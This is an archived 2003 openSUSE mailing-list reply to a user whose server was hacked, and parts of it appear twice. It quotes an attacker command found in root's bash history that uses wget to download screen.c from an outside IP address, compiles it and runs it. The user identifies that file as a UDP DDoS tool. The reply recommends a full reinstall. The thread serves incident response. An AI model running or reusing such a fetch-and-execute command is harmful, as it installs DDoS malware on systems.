Mailinglist Archive: opensuse (4165 mails)
| < Previous | Next > |
Re: [SLE] Help - Been Hacked!!
- From: Jim Cunning <jcunning@xxxxxxx>
- Date: Thu, 24 Apr 2003 13:19:30 -0700 (PDT)
- Message-id: <Pine.LNX.4.44.0304241309000.11231-100000@xxxxxxxxxxxxxxx>
On Apr 24 at 12:45pm, Matt Stamm wrote:
[...]
> I checked .bash_history as you suggested and found
> and interesting entry. This entry was in
> .bash_history in the 'root' directory.
>
>
> cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget
> -O screen.c wget http://64.5.4.47/screen.c;export
> PATH=.:/usr/bin:$PATH;gcc -o screen screen.c
> -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
>
>
> I'm new at this but based on a little research am
> I correct in assuming an external someone
> downloaded screen.c into my /var/tmp directory,
> compiled it to /usr/bin and then ran it. Is this
> correct? I looked at the source for 'screen.c' and
> in the title it says...
>
> Peer-to-peer UDP Distributed Denial of Service
> (PUD) by contem
[...]
Matt,
It appears you're still investigating what happened to your system, and
that's fine, but.... I know you've gotten advice from a number of people
to the effect that if _part_ of your system has been compromised, then the
_whole_ system is suspect, and the only reasonable action is a complete
reinstall. It's very good advice.
Go ahead and gather all the evidence you want, but save yourself some
trouble and future uncertainty and reinstall. Don't try to patch the
problem--you'll never know if you got everything.
Jim
[...]
> I checked .bash_history as you suggested and found
> and interesting entry. This entry was in
> .bash_history in the 'root' directory.
>
>
> cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget
> -O screen.c wget http://64.5.4.47/screen.c;export
> PATH=.:/usr/bin:$PATH;gcc -o screen screen.c
> -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
>
>
> I'm new at this but based on a little research am
> I correct in assuming an external someone
> downloaded screen.c into my /var/tmp directory,
> compiled it to /usr/bin and then ran it. Is this
> correct? I looked at the source for 'screen.c' and
> in the title it says...
>
> Peer-to-peer UDP Distributed Denial of Service
> (PUD) by contem
[...]
Matt,
It appears you're still investigating what happened to your system, and
that's fine, but.... I know you've gotten advice from a number of people
to the effect that if _part_ of your system has been compromised, then the
_whole_ system is suspect, and the only reasonable action is a complete
reinstall. It's very good advice.
Go ahead and gather all the evidence you want, but save yourself some
trouble and future uncertainty and reinstall. Don't try to patch the
problem--you'll never know if you got everything.
Jim
| < Previous | Next > |